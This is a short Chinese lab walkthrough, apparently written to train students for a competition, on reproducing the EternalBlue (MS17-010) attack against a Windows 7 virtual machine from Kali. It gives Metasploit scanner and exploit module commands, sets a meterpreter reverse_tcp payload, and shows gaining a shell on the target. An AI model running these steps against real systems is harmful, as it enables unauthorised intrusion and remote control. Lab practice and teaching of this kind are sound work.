因为某项比赛需要,正好带大一新人,就写下了这个。目前还只是一小部分,后续其他的漏洞会逐步复现。
操作系统渗透:windows系列
镜像下载网址:MSDN, 我告诉你 - 做一个安静的工具站 (itellyou.cn)
Get Kali | Kali Linux / Sudo apt update && sudo apt full-upgrade(更新kali)
- windows7(永恒之蓝漏洞)
- 网址:
MS17-010漏洞复现(带win7虚拟机安装,零基础)_永恒之蓝系统镜像-CSDN博客
2、操作步骤:
(1)查看win7和kali的ip地址:
①win7:192.168.72.136
②kali:192.168.72.128
(2)关闭win7防火墙
①打开控制面板②系统和安全③windows防火墙④打开或关闭windows防火墙
(3)开始渗透
①两个虚拟机互ping(测试是否互通)
②打开msfconsole
③寻找永恒之蓝漏洞(search ms17-010)
④use auxiliary/scanner/smb/smb_ms17_010(use 3)
⑤查看该模块所需要的参数配置 show options
⑥设置RHOST(攻击目标的ip)、执行扫描
△:Host is likely VULNERABLE to MS17-010显示主机很可能能够会受到永恒之蓝漏洞的攻击,代表我们现在可以攻击
⑦使用攻击模块(use 1)设置payload(set payload windows/x64/meterpreter/reverse_tcp)
查看需要配置参数(show options)
⑧设置目标靶机ip(win7)、设置攻击机ip(kali)、执行攻击
△:不知道因为什么导致攻击失败,这里切换到另一种攻击方式
⑨use windows/smb/ms17_010_eternalblue(use 0)
设置目标靶机ip(win7)
执行攻击
⑩当出现meterpreter即为攻击成功
⑪查看系统版本 sysinfo
⑫提权(shell)à返回到C盘目录下à创建名为a的文件夹
⑬在靶机(win7)C盘目录下看到kali新建的名为a的文件夹